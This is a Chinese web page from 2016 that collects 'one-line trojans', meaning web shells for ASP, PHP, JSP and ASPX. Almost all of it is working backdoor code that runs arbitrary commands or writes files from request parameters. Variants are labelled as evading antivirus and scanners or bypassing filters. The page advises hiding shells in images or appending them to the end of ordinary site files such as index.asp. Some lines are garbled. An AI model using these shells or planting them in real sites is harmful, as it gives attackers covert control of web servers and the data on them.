各种一句话木马大全
各种一句话木马大全
发布时间:2016-12-26 来源:查字典编辑
摘要:%>

<%eval request("c")%>

<%execute request("c")%>

<%execute(request("c"))%>

<%ExecuteGlobal request("sb")%>

%><%Eval(Request(chr(35)))%><%

<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>

<%eval(Request.Item["c"],"unsafe");%>

'备份专用

<%eval(request("c")):response.end%>

'无防下载表,有防下载表突破专用一句话

<%execute request("c")%><%<%loop<%:%>

<%<%loop<%:%><%execute request("c")%>

<%execute request("c")<%loop<%:%>

'防杀防扫专用

<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>

'不用"<,>"

<script language=VBScript runat=server>execute request("c")</script>

<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.

名字)+'') %>

<script language=vbs runat=server>eval(request("c"))</script>

<script language=vbs runat=server>eval_r(request("c"))</script>

'不用双引号

<%eval request(chr(35))%>

'可以躲过雷客图

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>

<%dy=request("dy")%><%Eval(dy)%>

'容错代码

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

PHP一句话

复制代码 代码如下:

<?php eval($_POST1);?>

<?php if(isset($_POST['c'])){eval($_POST['c']);}?>

<?php system($_REQUEST1);?>

<?php ($_=@$_GET1).@$_($_POST1)?>

<?php eval_r($_POST1)?>

<?php @eval_r($_POST1)?>//容错代码

<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句

<?$_POST['c']($_POST['cc']);?>

<?$_POST['c']($_POST['cc'],$_POST['cc'])?>

<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>

<?php echo `$_GET['r']` ?>

//绕过<?限制的一句话

<script language="php">@eval_r($_POST[sb])</script>

JSP一句话

复制代码 代码如下:

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>

提交客户端

<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>

ASPX一句话

<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

再补充几个:

推荐还是把一句话加进图片里面去。

普通的php一句话:<?php @eval($_POST['r00ts']);?>

普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%>

aspx突破一流的:

[code]

dim da

set fso=server.createobject("scripting.filesystemobject")

path=request("path")

if path<>"" then

data=request("da")

set da=fso.createtextfile(path,true)

da.write data

if err=0 then

Response.Write "yes"

else

Response.Write "no"

end if

err.clear

end if

set da=nothing

set fos=nothing

Response.Write "<form action=" method=post>"

Response.Write "<input type=text name=path>"

Response.Write "<br>"

Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))

Response.Write "<br>"

Response.Write "操作系统为:"&Request.ServerVariables("OS")

Response.Write "<br>"

Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")

Response.Write "<br>"

Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"

Response.Write "<br>"

Response.Write "<input type=submit value=save>"

Response.Write "</form>"

</Script>

ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防杀放扫 一句话:<?php (])?>

上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如

index.asp里面也是可以的!

因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件

的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system

($_REQUEST[1]);?>

无防下载表,有防下载表可尝试插入以下语句突破的一句话

<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request

(“class”)%><%execute request(“class”)'<% loop <%:%>

备份专用<%eval(request(“1″)):response.end%>

asp一句话<%execute(request(“1″))%>

aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y

(“add6bb58e139be10″);</script>

可以躲过雷客图的一句话。

<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)

ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,

requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>

不用双引号的一句话。<%eval request(chr(35))%>

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新网络安全学习
热门网络安全学习
实用技巧子分类